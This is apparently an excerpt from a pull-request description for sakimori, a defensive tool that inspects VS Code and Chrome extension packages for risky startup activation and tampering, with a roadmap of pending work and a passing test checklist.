| #21a | `f32fba4` | Fetch (proxy) | `sakimori-proxy::vsix_inspect` library. Opens OPC zip, extracts `extension/package.json`, returns `VsixInspection { activation_events, main, fires_on_startup, ... }`. `fires_on_startup` flags `"*"` wildcard and `onStartupFinished` — the highest-blast-radius VSCode activation primitives. 8 unit tests against synthetic VSIX. |

### Why this matters

No shipping product covers all four extension-attack failure modes at once:

- SCA (Snyk / Socket / Phylum / Dependabot): lockfile-bound, structurally blind to editor extensions.
- EDR (CrowdStrike etc.): sees `node` + argv, not "this was extension X v1.2.3".
- Registry firewalls (Sonatype Nexus Firewall, JFrog Xray): enterprise registries only, not endpoint extension dirs.
- Marketplace-mirror projects: hit product.json / EULA / ToS friction and only cover the fetch path.

sakimori covers fetch (#20) + runtime attribution (#19) + workspace poisoning (#23) + sideload tamper (#24) with one shared attribution/IOC backbone. The full reasoning lives in `README.md` under "Editor-extension coverage" and `CLAUDE.md` roadmap entries #19–#24.

### Still pending (intentionally — each its own follow-up PR)

- **#20 second half**: Chrome Web Store XML update manifest + out-of-band publish-time lookup.
- **#21 second half**: proxy integration for `inspect_vsix` (dispatch `LifecyclePolicy::{Audit, Block}` on the `.../vspackage` URL shape), strip mode (rewrite + integrity recompute), `.crx` audit.
- **#22**: `Ecosystem::VscodeExtension` / `ChromeExtension` propagation into the install log + OSV-JOIN advisory scan (cascades across 135 match arms — substantial refactor on its own).
- **#23 second half**: settings.json / extensions.json needles (require structural parsing, can't ship as plain substring rules without false positives).
- **#24 third half**: integration into `sakimori run` / `daemon` for automatic baseline + post-run diff around supervised steps.

## Test plan

- [x] `cargo fmt --all -- --check` (no diff)
- [x] `cargo clippy --workspace --all-targets -- -D warnings` (no warnings)
- [x] `cargo test --workspace` (all pass, including the new `proxy_vscode_marketplace_e2e` over real HTTP and the 8 `vsix_inspect` unit tests)
- [x] DCO `Signed-off-by:` on every commit